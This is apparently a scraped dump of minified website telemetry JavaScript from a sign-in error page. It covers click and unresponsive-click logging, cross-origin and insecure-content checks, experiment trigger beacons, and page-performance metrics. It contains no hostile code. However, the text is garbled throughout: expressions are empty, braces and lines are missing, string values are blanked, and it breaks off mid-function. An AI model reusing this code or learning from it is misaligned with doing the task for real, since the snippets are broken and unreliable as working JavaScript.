"function" === typeof c && "function" === typeof a && c(a(e))
} d = null
extractStringValue: function(a) {
if ("string" ===
typeof a) return a
})(ue_csm, window, document);
ue_csm.ue_unrt = 1500;
(function(d, b, t) {
function u(a, g) {
var c = a.srcElement || || {},
b = {
k: v,
t: g.t,
dt: g.dt,
x: a.pageX,
y: a.pageY,
p: e.getXPath(c),
n: c.nodeName
a.button && (b.b = a.button);
c.type && (b.ty = c.type);
c.href && (b.r = e.extractStringValue(c.href)); && (b.i =;
c.className && c.className.split && (b.c = c.className.split(/\s+/));
h += 1;
e.getFirstAscendingWidget(c, function(a) {
b.wd = a;
d.ue.log(b, r)
function w(a) {
if (!x(a.srcElement || {
m += 1;
n = !0;
var g = f = d.ue.d(),
p && "function" === typeof && a.timeStamp && (c = -
a.timeStamp, c = parseFloat(c.toFixed(2)));
s = b.setTimeout(function() {
u(a, {
t: g,
dt: c
}, y)
function z(a) {
if (a) {
var b = a.filter(A);
a.length !== b.length && (q = !0, k = d.ue.d(), n && q && (k && f && d.ue.log({
k: B,
t: f,
m: Math.abs(k - f)
}, r), l(), q = !1, k = 0))
function A(a) {
if (!a) return !1;
var b = "characterData" === a.type ? :;
if (!b || !b.hasAttributes || !b.attributes) return !1;
var c = {
"class": "gw-clock gw-clock-aria s-item-container-height-auto feed-carousel using-mouse kfs-inner-container".split(" "),
id: ["dealClock",
"deal_expiry_timer", "timer"
role: ["timer"]
d = !1;
Object.keys(c).forEach(function(a) {
var e = b.attributes[a] ? b.attributes[a].value : "";
(c[a] || "").forEach(function(a) {
-1 !== e.indexOf(a) && (d = !0)
return d
function x(a) {
if (!a) return !1;
var b = (e.extractStringValue(a.nodeName) || "").toLowerCase(),
c = (e.extractStringValue(a.type) || "").toLowerCase(),
d = (e.extractStringValue(a.href) || "").toLowerCase();
a = (e.extractStringValue( || "").toLowerCase();
var f = "checkbox color date datetime-local email file month number password radio range reset search tel text time url week".split(" ");
if (-1 !== ["select", "textarea", "html"].indexOf(b) || "input" === b && -1 !== f.indexOf(c) || "a" === b && -1 !== d.indexOf("http") || -1 !== ["sitbreaderrightpageturner", "sitbreaderleftpageturner", "sitbreaderpagecontainer"].indexOf(a)) return !0
function l() {
n = !1;
f = 0;
function C() {
b.ue.onunload(function() {
ue.count("armored-cxguardrails.unresponsive-clicks.violations", h);
ue.count("armored-cxguardrails.unresponsive-clicks.violationRate", h / m * 100 || 0)
if (b.MutationObserver && b.addEventListener && Object.keys &&
d && d.ue && d.ue.log && d.ue_unrt && d.ue_utils) {
var y = d.ue_unrt,
r = "cel",
v = "unr_mcm",
B = "res_mcm",
p = b.performance,
e = d.ue_utils,
n = !1,
f = 0,
s = 0,
q = !1,
k = 0,
h = 0,
m = 0;
b.addEventListener && (b.addEventListener("mousedown", w, !0), b.addEventListener("beforeunload", l, !0), b.addEventListener("visibilitychange", l, !0), b.addEventListener("pagehide", l, !0));
b.ue && b.ue.event && b.ue.onSushiUnload && b.ue.onunload && C();
(new MutationObserver(z)).observe(t, {
childList: !0,
attributes: !0,
characterData: !0,
subtree: !0
})(ue_csm, window, document);
ue_csm.ue.exec(function(g, e) {
if (e.ue_err) {
var f = "";
e.ue_err.errorHandlers || (e.ue_err.errorHandlers = []);
name: "fctx",
handler: function(a) {
if (!a.logLevel || "FATAL" === a.logLevel)
if (f = g.getElementsByTagName("html")[0].innerHTML) {
var b = f.indexOf("var ue_t0=ue_t0||+new Date();");
if (-1 !== b) {
var b = f.substr(0, b).split(String.fromCharCode(10)),
d = Math.max(b.length - 10 - 1, 0),
b = b.slice(d, b.length - 1);
a.fcsmln = d + b.length + 1;
a.cinfo = a.cinfo || {};
for (var c = 0; c < b.length; c++) a.cinfo[d + c + 1 + ""] =
b = f.split(String.fromCharCode(10));
a.cinfo = a.cinfo || {};
if (!(a.f || void 0 === a.l || a.l in a.cinfo))
for (c = +a.l - 1, d = Math.max(c - 5, 0), c = Math.min(c + 5, b.length - 1); d <= c; d++) a.cinfo[d + 1 + ""] = b[d]
}, "fatals-context")(document, window);
(function(m, b) {
function c(k) {
function f(a) {
a && "string" === typeof a && (a = (a = a.match(/^(?:https?:)?\/\/(.*?)(\/|$)/i)) && 1 < a.length ? a[1] : null, a && a && ("number" === typeof e[a] ? e[a]++ : e[a] = 1))
function d(a) {
var e = 10,
d = +new Date;
a && a.timeRemaining ? e = a.timeRemaining() : a = {
timeRemaining: function() {
return Math.max(0, e - (+new Date - d))
for (var c = b.performance.getEntries(), k = e; g < c.length && k > n;) c[g].name && f(c[g].name), g++, k = a.timeRemaining();
g >= c.length ? h(!0) : l()
function h(a) {
if (!a) {
a = m.scripts;
var c;
if (a)
for (var d =
0; d < a.length; d++)(c = a[d].getAttribute("src")) && "undefined" !== c && f(c)
0 < Object.keys(e).length && (p && ue_csm.ue && ue_csm.ue.event && (a = {
domains: e,
pageType: b.ue_pty || null,
subPageType: b.ue_spty || null,
pageTypeId: b.ue_pti || null
}, ue_csm.ue_sjslob && (a.lob = ue_csm.ue_lob || "0"), ue_csm.ue.event(a, "csm", "csm.CrossOriginDomains.2")), b.ue_ext = e)
function l() {
!0 === k ? d() : b.requestIdleCallback ? b.requestIdleCallback(d) : b.requestAnimationFrame ? b.requestAnimationFrame(d) : b.setTimeout(d, 100)
function c() {
if (b.performance &&
b.performance.getEntries) {
var a = b.performance.getEntries();
!a || 0 >= a.length ? h(!1) : l()
} else h(!1)
var e = b.ue_ext || {};
b.ue_ext || c();
return e
function q() {
setTimeout(c, r)
var s = b.ue_dserr || !1,
p = !0,
n = 1,
r = 2E3,
g = 0;
b.ue_err && s && (b.ue_err.errorHandlers || (b.ue_err.errorHandlers = []), b.ue_err.errorHandlers.push({
name: "ext",
handler: function(b) {
if (!b.logLevel || "FATAL" === b.logLevel) {
var f = c(!0),
d = [],
for (h in f) {
var f = h,
g = f.match(/amazon(\.com?)?\.\w{2,3}$/i);
g && 1 < g.length || -1 !== f.indexOf("") ||
-1 !== f.indexOf("") || -1 !== f.indexOf("") || d.push(h)
b.ext = d
b.ue && b.ue.isl ? c() : b.ue && ue.attach && ue.attach("load", q)
})(document, window);
var ue_wtc_c = 3;
ue_csm.ue.exec(function(b, e) {
function l() {
for (var a = 0; a < f.length; a++) a: for (var d = s.replace(A, f[a]) + g[f[a]] + t, c = arguments, b = 0; b < c.length; b++) try {
break a
} catch (e) {}
g = {};
f = [];
n = 0;
k = p
function u() {
B ? l(q) : l(C, q)
function v(a, m, c) {
if (r > w) d.count && 1 == r - w && (d.count("WeblabTriggerThresholdReached", 1), b.ue_int && console.error("Number of max call reached. Data will no longer be send"));
else {
var h = c || {};
h && -1 < h.constructor.toString().indexOf(D) && a && -1 < a.constructor.toString().indexOf(x) && m && -1 <
m.constructor.toString().indexOf(x) ? (h = b.ue_id, c && c.rid && (h = c.rid), c = h, a = encodeURIComponent(",wl=" + a + "/" + m), 2E3 > a.length + p ? (2E3 < k + a.length && u(), void 0 === g[c] && (g[c] = "", f.push(c)), g[c] += a, k += a.length, n || (n = e.setTimeout(u, E))) : b.ue_int && console.error("Invalid API call. The input provided is over 2000 chars.")) : d.count && (d.count("WeblabTriggerImproperAPICall", 1), b.ue_int && console.error("Invalid API call. The input provided does not match the API protocol i.e ue.trigger(String, String, Object)."))
function F() {
d.trigger &&
d.trigger.isStub && d.trigger.replay(function(a) {
v.apply(this, a)
function y() {
z || (f.length && l(q), z = !0)
var t = ":1234",
s = "//" + b.ue_furl + "/1/remote-weblab-triggers/1/OE/" + b.ue_mid + ":" + b.ue_sid + ":PLCHLDR_RID$s:wl-client-id%3DCSMTriger",
E = b.wtt || 1E4,
p = s.length + t.length,
w = b.mwtc || 2E3,
G = 1 === e.ue_wtc_c,
B = 3 === e.ue_wtc_c,
H = e.XMLHttpRequest && "withCredentials" in new e.XMLHttpRequest,
x = "String",
D = "Object",
d = b.ue,
g = {},
f = [],
k = p,
n, z = !1,
r = 0,
C = function() {
return {
send: function(a) {
if (H) {
var b = new e.XMLHttpRequest;"GET", a, !0);
G && (b.withCredentials = !0);
} else throw "";
q = function() {
return {
send: function(a) {
(new Image).src = a
e.encodeURIComponent && (d.attach && (d.attach("beforeunload", y), d.attach("pagehide", y)), F(), d.trigger = v)
}, "client-wbl-trg")(ue_csm, window);
(function(k, d, h) {
function f(a, c, b) {
a && a.indexOf && 0 === a.indexOf("http") && 0 !== a.indexOf("https") && l(s, c, a, b)
function g(a, c, b) {
a && a.indexOf && (location.href.split("#")[0] != a && null !== a && "undefined" !== typeof a || l(t, c, a, b))
function l(a, c, b, e) {
m[b] || (e = u && e ? n(e) : "N/A", d.ueLogError && d.ueLogError({
message: a + c + " : " + b,
logLevel: v,
stack: "N/A"
}, {
attribution: e
}), m[b] = 1, p++)
function e(a, c) {
if (a && c)
for (var b = 0; b < a.length; b++) try {
} catch (d) {}
function q() {
return d.performance && d.performance.getEntriesByType ?
d.performance.getEntriesByType("resource") : []
function n(a) {
if ( return "//*[@id='" + + "']";
var c;
c = 1;
var b;
for (b = a.previousSibling; b; b = b.previousSibling) b.nodeName == a.nodeName && (c += 1);
b = a.nodeName;
1 != c && (b += "[" + c + "]");
a.parentNode && (b = n(a.parentNode) + "/" + b);
return b
function w() {
var a = h.images;
a && a.length && e(a, function(a) {
var b = a.getAttribute("src");
f(b, "img", a);
g(b, "img", a)
function x() {
var a = h.scripts;
a && a.length && e(a, function(a) {
var b = a.getAttribute("src");
f(b, "script", a);
g(b, "script", a)
function y() {
var a = h.styleSheets;
a && a.length && e(a, function(a) {
if (a = a.ownerNode) {
var b = a.getAttribute("href");
f(b, "style", a);
g(b, "style", a)
function z() {
if (A) {
var a = q();
e(a, function(a) {
f(, a.initiatorType)
function B() {
e(q(), function(a) {
g(, a.initiatorType)
function r() {
var a;
a = d.location && d.location.protocol ? d.location.protocol : void 0;
"https:" == a && (z(), w(), x(), y(), B(), p < C && setTimeout(r, D))
var s = "[CSM] Insecure content detected ",
t = "[CSM] Ajax request to same page detected ",
v = "WARN",
m = {},
p = 0,
D = k.ue_nsip || 1E3,
C = 5,
A = 1 == k.ue_urt,
u = !0;
ue_csm.ue_disableNonSecure || (d.performance && d.performance.setResourceTimingBufferSize && d.performance.setResourceTimingBufferSize(300), r())
})(ue_csm, window, document);
var ue_aa_a = "";
if (ue.trigger && (ue_aa_a === "C" || ue_aa_a === "T1")) {
(function(f, b) {
function g() {
try {
b.PerformanceObserver && "function" === typeof b.PerformanceObserver && (a = new b.PerformanceObserver(function(b) {
}), a.observe(d))
} catch (h) {
function m() {
for (var h = d.entryTypes, a = 0; a < h.length; a++) c(b.performance.getEntriesByType(h[a]))
function c(a) {
if (a && Array.isArray(a)) {
for (var c = 0, e = 0; e < a.length; e++) {
var d = l.indexOf(a[e].name);
if (-1 !== d) {
var g = Math.round(b.performance.timing.navigationStart + a[e].startTime);
f.uet(n[d], void 0, void 0, g);
l.length ===
c && k()
function k() {
a && a.disconnect && "function" === typeof a.disconnect && a.disconnect()
if ("function" === typeof f.uet && b.performance && "object" === typeof b.performance && b.performance.getEntriesByType && "function" === typeof b.performance.getEntriesByType && b.performance.timing && "object" === typeof b.performance.timing && "number" === typeof b.performance.timing.navigationStart) {
var d = {
entryTypes: ["paint"]
l = ["first-paint", "first-contentful-paint"],
n = ["fp", "fcp"],
try {
m(), g()
} catch (p) {
f.ueLogError(p, {
logLevel: "ERROR",
attribution: "performanceMetrics"
})(ue_csm, window);
if (window.csa) {
csa("Events")("setEntity", {
page: {
pageType: "AuthenticationPortal",
subPageType: "Error404Page",
pageTypeId: ""
csa.plugin(function(c) {
var m = "transitionStart",
n = "pageVisible",
e = "PageTiming",
t = "visibilitychange",
s = "$latency.visible",
i =,
r = (i.performance || {}).timing,
a = ["navigationStart", "unloadEventStart", "unloadEventEnd", "redirectStart", "redirectEnd", "fetchStart", "domainLookupStart", "domainLookupEnd", "connectStart", "connectEnd", "secureConnectionStart", "requestStart", "responseStart", "responseEnd", "domLoading", "domInteractive", "domContentLoadedEventStart", "domContentLoadedEventEnd", "domComplete", "loadEventStart", "loadEventEnd"],
u = c.config,
o = i.Math,
l = o.max,
g = o.floor,
d = i.document || {},
f = (r || {}).navigationStart,
v = f,
p = 0,
S = null;
if (i.Object.keys && [].forEach && !u["KillSwitch." + e]) {
if (!r || null === f || f <= 0 || void 0 === f) return c.error("Invalid navigation timing data: " + f);
S = new E({
schemaId: "<ns>.PageLatency.6",
producerId: "csa"
}), "boolean" != typeof d.hidden && "string" != typeof d.visibilityState || !d.removeEventListener ? c.emit(s) : b() ? (c.emit(s), I(n, f)) : c.on(d, t, function e() {
b() && (v = c.time(), d.removeEventListener(t, e), I(m, v), I(n, v), c.emit(s))
}), c.once("$unload", h), c.once("$load", h), c.on("$pageTransition", function() {
v = c.time()
}), c.register(e, {
mark: I,
instance: function(e) {
return new E(e)
function E(e) {
var i, r = null,
a = e.ent || {
page: ["pageType", "subPageType", "requestId"]
o = e.logger || c("Events", {
producerId: e.producerId,
lob: u.lob || "0"
if (!e || !e.producerId || !e.schemaId) return c.error("The producer id and schema Id must be defined for PageLatencyInstance.");
function d() {
return i || v
function n() {
r = c.UUID()
this.mark = function(n, t) {
if (null != n) return t = t || c.time(), n === m && (i = t), c.once(s, function() {
o("log", {
messageId: r,
__merge: function(e) {
e.markers[n] = function(e, n) {
return l(0, n - (e || v))
}(d(), t), e.markerTimestamps[n] = g(t)
markers: {},
markerTimestamps: {},
navigationStartTimestamp: d() ? new Date(d()).toISOString() : null,
schemaId: e.schemaId
}, {
ent: a
}), t
}, n(), c.on("$beforePageTransition", n)
function I(e, n) {
e === m && (v = n);
var t = S.mark(e, n);
c.emit("$timing:" + e, t)
function h() {
if (!p) {
for (var e = 0; e < a.length; e++) r[a[e]] && I(a[e], r[a[e]]);
p = 1
function b() {
return !d.hidden || "visible" === d.visibilityState
csa.plugin(function(u) {
var f, c, l = "length",
a = "parentElement",
t = "target",
i = "getEntriesByName",
e = "perf",
n = null,
r = "_csa_flt",
o = "_csa_llt",
s = "previousSibling",
d = "visuallyLoaded",
g = "client",
h = "offset",
m = "scroll",
p = "Width",
v = "Height",
y = g + p,
E = g + v,
S = h + p,
b = h + v,
x = m + p,
O = m + v,
_ = "_osrc",
w = "_elt",
L = "_eid",
T = 10,
I = 5,
N = 15,
k = 100,
B =,
H = u.timeout,
W = B.Math,
Y = W.max,
C = W.floor,
F = W.ceil,
M = B.document || {},
R = M.body || {},
V = M.documentElement || {},
$ = B.performance || {},
P = ($.timing || {}).navigationStart,
X =,
D = Object.values || (u.types || {}).ovl,
J = u("PageTiming"),
j = u("SpeedIndexBuffers"),
q = [],
Q = [],
U = [],
z = [],
A = [],
G = [],
K = .1,
Z = .1,
ee = 0,
ne = 0,
te = !0,
ie = 0,
re = 0,
oe = 1 == u.config["SpeedIndex.ForceReplay"],
ae = 0,
fe = 1,
ue = 0,
ce = {},
le = [],
se = 0,
de = {
buffered: 1
function ge(e) { || u.emit("$csmTag:" + e, 0, de)
function he() {
for (var e = X(), n = 0; f;) {
if (0 !== f[l]) {
if (!1 !== f.h(f[0]) && f.shift(), n++, !oe && n % T == 0 && X() - e > I) break
} else f = f.n
ee = 0, f && (ee || (!0 === M.hidden ? (oe = 1, he()) : u.timeout(he, 0)))
function me(e, n, t, i, r) {
ue = C(e), q = n, Q = t, U = i, G = r;
var o = M.createTreeWalker(M.body, NodeFilter.SHOW_TEXT, null, null),
a = {
w: B.innerWidth,
h: B.innerHeight,
x: B.pageXOffset,
y: B.pageYOffset
M.body[w] = e, z.push({
w: o,
vp: a
}), A.push({
img: M.images,
iter: 0
}), q.h = pe, (q.n = Q).h = ve, (Q.n = U).h = ye, (U.n = z).h = Ee, (z.n = A).h = Se, (A.n = G).h = be, f = q, he()
function pe(e) {
e.m.forEach(function(e) {
for (var n = e; n && (e === n || !n[r] || !n[o]);) n[r] || (n[r] = e[r]), n[o] || (n[o] = e[o]), n[w] = n[r] - P, n = n[s]
function ve(e) {
e.m.forEach(function(e) {
var n = e[t];
_ in n || (n[_] = e.oldValue)
function ye(n) {
n.m.forEach(function(e) {
e[t][w] = n.t - P
function Ee(e) {
for (var n, t = e.vp, i = e.w, r = T;
(n = i.nextNode()) && 0 < r;) {
r -= 1;
var o = (n[a] || {}).nodeName;
"SCRIPT" !== o && "STYLE" !== o && "NOSCRIPT" !== o && "BODY" !== o && 0 !== (n.nodeValue || "").trim()[l] && Le(n[a], xe(n), t)
return !n
function Se(e) {
for (var n = {
w: B.innerWidth,
h: B.innerHeight,
x: B.pageXOffset,
y: B.pageYOffset
}, t = T; e.iter < e.img[l] && 0 < t;) {
var i, r = e.img[e.iter],
o = we(r),
a = o && xe(o) || xe(r);
o ? (o[w] = a, i = _e(o.querySelector('[aria-posinset="1"] img') || r) || a, r = o) : i = _e(r) || a, re && c < i && (i = a), Le(r, i, n), e.iter += 1, t -= 1
return e.img[l] <= e.iter
function be(e) {
var n = [],
i = 0,
r = 0,
o = ne,
t = B.innerHeight || Y(R[O] || 0, R[b] || 0, V[E] || 0, V[O] || 0, V[b] || 0),
a = C(e.y / k),
f = F((e.y + t) / k);
le.slice(a, f).forEach(function(e) {
(e.elems || []).forEach(function(e) { in n || (n[] = {}), in n[] || (i += (n[][] = e).a)
}), ge("startVL"), D(n).forEach(function(e) {
D(e).forEach(function(e) {
var n = 1 - r / i,
t = Y(, o);
se += n * (t - o), o = t,
function(e, n) {
var t;
for (; K <= 1 && K - .01 <= e;) Te(d + (t = (100 * K).toFixed(0)),, "50" !== t && "90" !== t || u("Content", {
target: n.e
})("mark", d + t, P + F( || 0)), K += Z
}((r += e.a) / i, e)
}), ge("endVL"), ne = e.t - P, G[l] <= 1 && (Te("speedIndex", se), Te(d + "0", ue)), te && (te = !1, Te("atfSpeedIndex", se))
function xe(e) {
for (var n = e[a], t = N; n && 0 < t;) {
if (n[w] || 0 === n[w]) return Y(n[w], ue);
n = n.parentElement, t -= 1
function Oe(e, n) {
if (e) {
if (!e.indexOf("data:")) return xe(n);
var t = $[i](e) || [];
if (0 < t[l]) return Y(F(t[0].responseEnd || 0), ue)
function _e(e) {
return Oe(e[_], e) || Oe(e.currentSrc, e) || Oe(e.src, e)
function we(e) {
for (var n = 10, t = e.parentElement; t && 0 < n;) {
if (t.classList && t.classList.contains("a-carousel-viewport")) return t;
t = t.parentElement, n -= 1
return null
function Le(e, n, t) {
if ((n || 0 === n) && !e[L]) {
var i = e.getBoundingClientRect(),
r = i.width * i.height,
o = t.w || Y(R[x] || 0, R[S] || 0, V[y] || 0, V[x] || 0, V[S] || 0) || i.right,
a = i.width / 2,
f = fe++;
if (0 != r && !(a < i.right - o || i.right < a)) {
for (var u = {
e: e,
lt: n,
a: r,
id: f
}, c = C(( + t.y) / k), l = F(( + t.y + i.height) / k), s = c; s <= l; s++) s in le || (le[s] = {
elems: [],
lt: 0
}), le[s].elems.push(u);
e[L] = f
function Te(e, n) {
J("mark", e, P + F((ce[e] = n) || 0))
function Ie(e) {
ae || (ge("browserQuite" + e), j("getBuffers", me), ae = 1)
P && D && $[i] ? (ge(e + "Yes"), j("registerListener", function() {
re && (clearTimeout(ie), ie = H(Ie.bind(n, "Mut"), 2500))
}), u.once("$unload", function() {
oe = 1, Ie("Ud")
}), u.once("$load", function() {
re = 1, c = X() - P, ie = H(Ie.bind(n, "Ld"), 2500)
}), u.once("$timing:functional", Ie.bind(n, "Fn")), j("replayModuleIsLive"), u.register("SpeedIndex", {
getMarkers: function(e) {
e && e(JSON.parse(JSON.stringify(ce)))
})) : ge(e + "No")
csa.plugin(function(e) {
var m = !!e.config["LCP.elementDedup"],
t = !1,
n = e("PageTiming"),
r =,
a =;
function i() {
return a.timing.navigationStart
function o() {
t || function(o) {
var l = new r(function(e) {
var t = e.getEntries();
if (0 !== t.length) {
var n = t[t.length - 1];
if (m && "" !== && n.element && "IMG" === n.element.tagName) {
for (var r = {}, a = t[0], i = 0; i < t.length; i++) t[i].id in r || ("" !== t[i].id && (r[t[i].id] = !0), a.startTime < t[i].startTime && (a = t[i]));
n = a
l.disconnect(), o({
startTime: n.startTime,
renderTime: n.renderTime,
loadTime: n.loadTime
try {
type: "largest-contentful-paint",
buffered: !0
} catch (e) {}
}(function(e) {
e && (t = !0, n("mark", "largestContentfulPaint", Math.floor(e.startTime + i())), e.renderTime && n("mark", "largestContentfulPaint.render", Math.floor(e.renderTime + i())), e.loadTime && n("mark", "largestContentfulPaint.load", Math.floor(e.loadTime + i())))
r && a && a.timing && (e.once("$unload", o), e.once("$load", o), e.register("LargestContentfulPaint", {}))
csa.plugin(function(r) {
var e = r("Metrics", {
producerId: "csa"
n =;
n && (n = new n(function(r) {
var t = r.getEntries();
if (0 === t.length || !t[0].processingStart || !t[0].startTime) return;
! function(r) {
r = r || 0, n.disconnect(), 0 <= r ? e("recordMetric", "firstInputDelay", r) : e("recordMetric", "firstInputDelay.invalid", 1)
}(t[0].processingStart - t[0].startTime)
}), function() {
try {
type: "first-input",
buffered: !0
} catch (r) {}
csa.plugin(function(d) {
var e = "Metrics",
g = d.config,
f = 0;
function r(i) {
var c, t, e = i.producerId,
r = i.logger,
o = r || d("Events", {
producerId: e,
lob: g.lob || "0"
s = (i || {}).dimensions || {},
u = {},
n = -1;
if (!e && !r) return d.error("Either a producer id or custom logger must be defined");
function a() {
n !== f && (c = d.UUID(), t = d.UUID(), u = {}, n = f)
this.recordMetric = function(r, n) {
var e = i.logOptions || {
ent: {
page: ["pageType", "subPageType", "requestId"]
e.debugMetric = i.debugMetric, a(), o("log", {
messageId: c,
schemaId: i.schemaId || "<ns>.Metric.4",
metrics: {},
dimensions: s,
__merge: function(e) {
e.metrics[r] = n
}, e)
}, this.recordCounter = function(r, e) {
var n = i.logOptions || {
ent: {
page: ["pageType", "subPageType", "requestId"]
if ("string" != typeof r || "number" != typeof e || !isFinite(e)) return d.error("Invalid type given for counter name or counter value: " + r + "/" + e);
a(), r in u || (u[r] = {});
var c = u[r];
"f" in c || (c.f = e), c.c = (c.c || 0) + 1, c.s = (c.s || 0) + e, c.l = e, o("log", {
messageId: t,
schemaId: i.schemaId || "<ns>.InternalCounters.3",
c: {},
__merge: function(e) {
r in e.c || (e.c[r] = {}), c.fs || (c.fs = 1, e.c[r].f = c.f), 1 < c.c && (e.c[r].s = c.s, e.c[r].l = c.l, e.c[r].c = c.c)
}, n)
g["KillSwitch." + e] || (new r({
producerId: "csa"
}).recordMetric("baselineMetricEvent", 1), d.on("$beforePageTransition", function() {
}), d.register(e, {
instance: function(e) {
return new r(e || {})
csa.plugin(function(t) {
var a, n = t.config,
r = ( || {}).timing,
s = (r || {}).navigationStart || t.time();
function e() {
a = t.UUID()
function i(i) {
var r = (i = i || {}).producerId,
e = i.logger,
o = e || t("Events", {
producerId: r,
lob: n.lob || "0"
if (!r && !e) return t.error("Either a producer id or custom logger must be defined");
this.mark = function(e, r) {
var n = (void 0 === r ? t.time() : r) - s;
o("log", {
messageId: a,
schemaId: i.schemaId || "<ns>.Timer.1",
markers: {},
__merge: function(r) {
r.markers[e] = n
}, i.logOptions)
r && (e(), t.on("$beforePageTransition", e), t.register("Timers", {
instance: function(r) {
return new i(r || {})
csa.plugin(function(t) {
var e = "takeRecords",
i = "disconnect",
n = "function",
o = t("Metrics", {
producerId: "csa"
c = t("PageTiming"),
a =,
u = t.timeout,
r = t.on,
f = a.PerformanceObserver,
m = 0,
l = !1,
s = 0,
d = a.performance,
h = a.document,
v = null,
y = !1,
g = t.blank;
function p() {
l || (l = !0, clearTimeout(v), typeof f[e] === n && f[e](), typeof f[i] === n && f[i](), o("recordMetric", "documentCumulativeLayoutShift", m), c("mark", "cumulativeLayoutShiftLastTimestamp", Math.floor(s + d.timing.navigationStart)))
f && d && d.timing && h && (f = new f(function(t) {
v && clearTimeout(v);
t.getEntries().forEach(function(t) {
t.hadRecentInput || (m += t.value, s < t.startTime && (s = t.startTime))
}), v = u(p, 5e3)
}), function() {
try {
type: "layout-shift",
buffered: !0
}), v = u(p, 5e3)
} catch (t) {}
}(), g = r(h, "click", function(t) {
y || (y = !0, o("recordMetric", "documentCumulativeLayoutShiftToFirstInput", m), g())
}), r(h, "visibilitychange", function() {
"hidden" === h.visibilityState && p()
}), t.once("$unload", p))
csa.plugin(function(e) {
var t, n =,
r = n.PerformanceObserver,
c = e("Metrics", {
producerId: "csa"
o = 0,
i = 0,
a = -1,
l = n.Math,
f = l.max,
u = l.ceil;
if (r) {
t = new r(function(e) {
e.getEntries().forEach(function(e) {
var t = e.duration;
o += t, i += t, a = f(t, a)
try {
type: "longtask",
buffered: !0
} catch (e) {}
t = new r(function(e) {
0 < e.getEntries().length && (i = 0, a = -1)
try {
type: "largest-contentful-paint",
buffered: !0
} catch (e) {}
e.on("$unload", g), e.on("$beforePageTransition", g)
function g() {
c("recordMetric", "totalBlockingTime", u(i || 0)), c("recordMetric", "totalBlockingTimeInclLCP", u(o || 0)), c("recordMetric", "maxBlockingTime", u(a || 0)), i = o = 0, a = -1
csa.plugin(function(o) {
var e = "CacheDetection",
r = "csa-ctoken-",
n =,
t = o.deleteStored,
c = o.config,
a = c[e + ".RequestID"],
i = c[e + ".Callback"],
s =,
u = s.document || {},
d = s.Date,
l = o("Events"),
f = o("Events", {
producerId: "csa",
lob: c.lob || "0"
function p(e) {
try {
var n = u.cookie.match(RegExp("(^| )" + e + "=([^;]+)"));
return n && n[2].trim()
} catch (e) {}
}! function() {
var e = function() {
var e = p("cdn-rid");
if (e) return {
r: e,
s: "cdn"
}() || function() {
if ( + a)) return {
r: o.UUID().toUpperCase().replace(/-/g, "").slice(0, 20),
s: "device"
}() || {},
n = e.r,
c = e.s;
if (!!n) {
var t = p("session-id");
! function(e, n, c, t) {
l("setEntity", {
page: {
pageSource: "cache",
requestId: e,
cacheRequestId: a,
cacheSource: t
session: {
id: c
}(n, 0, t, c), "device" === c && f("log", {
schemaId: "<ns>.CacheImpression.2"
}, {
ent: "all"
}), i && i(n, t, c)
}(), n(r + a, + 36e5), o.once("$load", function() {
var c =;
t(function(e, n) {
return 0 == e.indexOf(r) && parseInt(n) < c
csa.plugin(function(u) {
var i, t = "Content",
e = "MutationObserver",
n = "addedNodes",
a = "querySelectorAll",
f = "matches",
r = "getAttributeNames",
o = "getAttribute",
s = "dataset",
c = "widget",
l = "producerId",
d = "slotId",
h = "iSlotId",
g = {
ent: {
element: 1,
page: ["pageType", "subPageType", "requestId"]
p = 5,
m = u.config[t + ".BubbleUp.SearchDepth"] || 35,
y = u.config[t + ".SearchPage"] || 0,
v = "csaC",
b = v + "Id",
E = "logRender",
w = {},
I = u.config,
O = I[t + ".Selectors"] || [],
C = I[t + ".WhitelistedAttributes"] || {
href: 1,
class: 1
N = I[t + ".EnableContentEntities"],
S = I["KillSwitch.ContentRendered"],
k =,
A = k.document || {},
U = A.documentElement,
L = k.HTMLElement,
R = {},
_ = [],
j = function(t, e, n, i) {
var o = this,
r = u("Events", {
producerId: t || "csa",
lob: I.lob || "0"
e.type = e.type || c, =, o.l = r, o.e = e, o.el = n, o.rt = i, o.dlo = g, o.op = W(n, "csaOp"), o.log = function(t, e) {
r("log", t, e || g)
}, o.entities = function(t) {
}, && r("setEntity", {
element: e
x = j.prototype;
function D(t) {
var e = (t = t || {}).element,
n =;
return e ? function(t, e) {
var n;
n = t instanceof L ? K(t) || Y(e[l], t, z, u.time()) : R[] || H(e[l], 0, t, u.time());
return n
}(e, t) : n ? M(n) : u.error("No element or target argument provided.")
function M(t) {
var e = function(t) {
var e = null,
n = 0;
for (; t && n < m;) {
if (n++, P(t, b)) {
e = t;
t = t.parentElement
return e
return e ? K(e) : new j("csa", {
id: null
}, null, u.time())
function P(t, e) {
if (t && t.dataset) return t.dataset[e]
function T(t, e, n) {
n: n,
e: t,
t: e
}), B()
function q() {
for (var t = u.time(), e = 0; 0 < _.length;) {
var n = _.shift();
if (w[n.n](n.e, n.t), ++e % 10 == 0 && u.time() - t > p) break
i = 0, _.length && B()
function B() {
i = i || u.raf(q)
function X(t, e, n) {
return {
n: t,
e: e,
t: n
function Y(t, e, n, i) {
var o = u.UUID(),
r = {
id: o
c = M(e);
return e[s][b] = o, n(r, e), c && && (r.parentId =, H(t, e, r, i)
function $(t) {
return isNaN(t) ? null : Math.round(t)
function H(t, e, n, i) {
N && (n.schemaId = "<ns>.ContentEntity.2"), = || u.UUID();
var o = new j(t, n, e, i);
return function(t) {
return !S && ((t.op || {}).hasOwnProperty(E) || y)
}(o) && function(t, e) {
var n = {},
i = u.exec($);
t.el && (n = t.el.getBoundingClientRect()), t.log({
schemaId: "<ns>.ContentRender.3",
timestamp: e,
width: i(n.width),
height: i(n.height),
positionX: i(n.left + k.pageXOffset),
positionY: i( + k.pageYOffset)
}(o, i), u.emit("$content.register", o), R[] = o
function K(t) {
return R[(t[s] || {})[b]]
function W(n, i) {
var o = {};
return r in (n = n || {}) && Object.keys(n[s]).forEach(function(t) {
if (!t.indexOf(i) && i.length < t.length) {
var e = function(t) {
return (t[0] || "").toLowerCase() + t.slice(1)
o[e] = n[s][t]
}), o
function z(t, e) {
r in e && (function(t, e) {
var n = W(t, v);
Object.keys(n).forEach(function(t) {
e[t] = n[t]
}(e, t), d in t && (t[h] = t[d]), function(e, n) {
(e[r]() || []).forEach(function(t) {
t in C && (n[t] = e[o](t))
}(e, t))
U && A[a] && k[e] && (O.push({
selector: "*[data-csa-c-type]",
entity: z
}), O.push({
selector: ".celwidget",
entity: function(t, e) {
z(t, e), t[d] = t[d] || e[o]("cel_widget_id") ||, t.legacyId = e[o]("cel_widget_id") ||, t.type = t.type || c
}), w[1] = function(t, e) {
t.forEach(function(t) {
t[n] && t[n].constructor && "NodeList" === t[n] &&[n], function(t) {
